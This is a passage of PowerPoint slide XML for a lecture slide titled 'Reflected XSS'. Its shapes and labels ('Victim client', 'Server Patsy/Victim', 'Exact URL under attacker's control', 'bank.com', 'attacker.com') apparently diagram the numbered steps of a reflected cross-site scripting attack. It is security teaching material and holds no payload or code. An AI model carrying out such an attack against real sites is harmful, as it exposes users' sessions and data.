          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2835275"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="182562" y="365124"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218344" y="3540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283848" y="30672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334452" y="81276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361584" y="146780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2835275"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2336296" y="2842577"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714739" y="3933939"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714739" y="3933939"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2779163" y="3988389"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483225" y="4739640"/>
            <a:ext cx="2199640" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Patsy/Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="3124200"/>
            <a:ext cx="2590800" cy="841375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="65881"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="41275" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="85725" marR="180340">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="325"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Exact URL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>under  attacker’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="3962400"/>
            <a:ext cx="838200" cy="788035"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="838200" h="788035">
                <a:moveTo>
                  <a:pt x="838199" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="836414" y="59818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="834397" y="119317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="831913" y="178177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828731" y="236079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="824618" y="292704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="819340" y="347733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="812665" y="400845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="804361" y="451723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="794194" y="500046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="781931" y="545495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="767341" y="587751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="750188" y="626494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="730242" y="661406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707270" y="692166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651390" y="740063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582548" y="770185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="543821" y="779339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502531" y="784980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="458914" y="787428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413201" y="787003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365625" y="784022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="316420" y="778807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265818" y="771676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214051" y="762948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161353" y="752942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107957" y="741979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54094" y="730378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="718456"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="15874">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7159625" y="6278372"/>
            <a:ext cx="918210" cy="269240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="408000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Title 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C78CE5B0-CD3D-B84F-89FD-1E7B985D41ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4424F21-2C31-BA44-A228-6C9C24A4A850}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6397625" y="3001772"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a: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09600" y="2907136"/>
            <a:ext cx="1417532" cy="1264284"/>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5959475" y="5208588"/>
            <a:ext cx="1148521" cy="1406460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301625" y="4130040"/>
            <a:ext cx="1379220" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2274888" y="4191000"/>
            <a:ext cx="2738120" cy="958850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2738120" h="958850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738079" y="958251"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957734" y="5094017"/>
            <a:ext cx="122523" cy="89237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
